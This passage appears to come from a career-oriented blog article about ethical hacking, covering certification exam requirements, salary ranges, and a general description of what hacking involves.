To take the exam, one will first have to go through training at an ATC or Accredited Training Center. If you don’t want to and opt to self-study, you must have proof of at least 2-years’ worth of relevant security work experience (or educational background equating to this). Then, there are 150 questions answerable in 4 hours, coupled with a testing and reservation fee. Pass it, and voila! You are officially an ethical hacker!
Who says hackers can’t get credentials?

Why You Should Give Hacking A Shot

In real life, hackers always get caught. Aside from national laws in different parts of the world, there are different multinational agencies that can track anyone, anywhere. This means if you mess with a target big enough, you might find yourself on the run. So, is there really anything for hacking aside from the trill? Indeed, there is - today, hackers can earn anywhere from $50,000 to $100,000 a year, depending on your experience and education. This is in the form of “ethical” or “white-hat” hacking. In this world where security becomes more and more of a pressing concern, the market for white hats has increased year on year. In fact, figures project a total of 40% increase in security-related spending among global corporations between 2011 and 2015. This means if you have a passion for poking into networks and revealing exploits, you can put those skills to use without going out on a limb or getting thrown in jail.

What a Hacker Really Is

As shown here, a hacker is pretty much capable of causing far-reaching damage quite similar to the way Hollywood says. Depending on the conditions, a capable hacker can take over user accounts, compromise systems, and even get away with stolen intellectual property.
The main difference between the movies and real life is that hacking is never really easy. And no, real hacking skills take more than learning how to Google. Granted, stealing someone’s password can be done any day even by “script kiddies” (those who rely on FAQs and pre-built tools). In reality, hacking involves knowing exactly how a system works. This means a hacker probably has built that system at one point, has tinkered with it, has tested its responses to different inputs, and has already pinpointed and analyzed its weaknesses.